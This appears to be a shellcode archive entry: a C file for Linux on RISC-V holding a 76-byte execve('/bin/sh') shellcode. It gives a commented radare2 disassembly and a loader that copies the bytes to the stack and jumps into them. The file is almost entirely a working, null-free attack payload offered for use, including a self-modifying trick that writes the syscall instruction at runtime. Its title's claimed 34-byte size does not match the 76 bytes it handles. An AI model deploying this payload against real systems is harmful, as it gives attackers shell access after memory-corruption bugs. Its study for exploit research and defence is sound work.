/*
Title:  Linux/RISC-V - execve("/bin/sh", NULL, 0) - 34 bytes
Date:   2019-06-06
Tested: riscv64 (qemu isa rv64imafdcu)
Author: Christina Quast - twitter: @binarychrysh

Inspired by: https://thomask.sdf.org/blog/2018/08/25/basic-shellcode-in-riscv-linux.html

Shellcode RISC-V without 0x20, 0x0a and 0x00

compiler (assuming riscv platform): gcc -z execstack -o loader loader.c

r2 output:
[0x000100b0]> pdf
            ;-- section..text:
            ;-- _start:
            ;-- rip:
/ (fcn) entry0 76
|   entry0 ();
|           0x000100b0      0111           addi sp, sp, -32            ; [01] -r-x section size 76 named .text
|           0x000100b2      06ec           sd ra, 24(sp)
|           0x000100b4      22e8           sd s0, 16(sp)
|           0x000100b6      13042102       addi s0, sp, 34
|           0x000100ba      b767696e       lui a5, 0x6e696
|           0x000100be      9387f722       addi a5, a5, 559
|           0x000100c2      2330f4fe       sd a5, -32(s0)
|           0x000100c6      b7776810       lui a5, 0x10687
|           0x000100ca      33480801       xor a6, a6, a6
|           0x000100ce      0508           addi a6, a6, 1
|           0x000100d0      7208           slli a6, a6, 0x1c
|           0x000100d2      b3870741       sub a5, a5, a6
|           0x000100d6      9387f732       addi a5, a5, 815
|           0x000100da      2332f4fe       sd a5, -28(s0)
|           0x000100de      930704fe       addi a5, s0, -32
|           0x000100e2      0146           li a2, 0
|           0x000100e4      8145           li a1, 0
|           0x000100e6      3e85           mv a0, a5
|           0x000100e8      9308d00d       li a7, 221
|           0x000100ec      93063007       li a3, 115
|           0x000100f0      230ed1ee       sb a3, -260(sp)
|           0x000100f4      9306e1ef       addi a3, sp, -258
\           0x000100f8      6780e6ff       jr -2(a3)


*/

#include <stdio.h>
#include <string.h>

char *SC = "\x01\x11\x06\xec"
           "\x22\xe8\x13\x04"
           "\x21\x02\xb7\x67"
           "\x69\x6e\x93\x87"
           "\xf7\x22\x23\x30"
           "\xf4\xfe\xb7\x77"
           "\x68\x10\x33\x48"
           "\x08\x01\x05\x08"
           "\x72\x08\xb3\x87"
           "\x07\x41\x93\x87"
           "\xf7\x32\x23\x32"
           "\xf4\xfe\x93\x07"
           "\x04\xfe\x01\x46"
           "\x81\x45\x3e\x85"
           "\x93\x08\xd0\x0d"
           "\x93\x06\x30\x07"
           "\x23\x0e\xd1\xee"
           "\x93\x06\xe1\xef"
           "\x67\x80\xe6\xff";


int main(void)
{
    char payload[76];

    memcpy(payload, SC, 76);

    fprintf(stdout, "Length: %d\n", strlen(SC));
    (*(void(*)()) payload) ();

return 0;
}